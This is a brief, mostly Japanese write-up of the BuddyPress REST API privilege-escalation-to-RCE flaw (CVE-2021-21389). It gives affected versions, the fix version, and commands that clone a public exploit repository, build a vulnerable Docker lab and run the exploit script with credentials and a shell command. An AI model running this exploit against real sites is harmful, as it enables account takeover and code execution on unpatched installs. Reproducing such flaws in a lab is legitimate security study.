
BuddyPressは、コミュニティサイトを構築するためのオープンソースのWordPressプラグインです。BuddyPress 5.0.0から7.2.1未満のリリースでは、一般ユーザー(非特権ユーザー)がREST APIメンバーエンドポイントの脆弱性を悪用することで管理者権限を取得できる可能性があります。この脆弱性はBuddyPress 7.2.1で修正されました。この問題を軽減するには、プラグインの既存のインストールをこのバージョンに更新する必要があります。
BuddyPress < 7.2.1 - REST API権限昇格によるRCE
PoC (完全版)
影響を受けるバージョン: 5.0.0 から 7.2.0
ユーザー要件: 購読者ユーザー
手法: REST APIを介した管理者への権限昇格とRCEのトリガー
エンドポイント: /v1/members/me エンドポイント
git clone https://github.com/HoangKien1020/CVE-2021-21389
cd CVE-2021-21389/
docker build . -t hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Other way to pull this docker instead of building:
docker pull hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Access your host/IP
Ex: http://test.local:8080
python3 CVE-2021-21389.py http://test.local:8080 test 1234 whoami
例:

https://buddypress.org/2021/03/buddypress-7-2-1-security-release/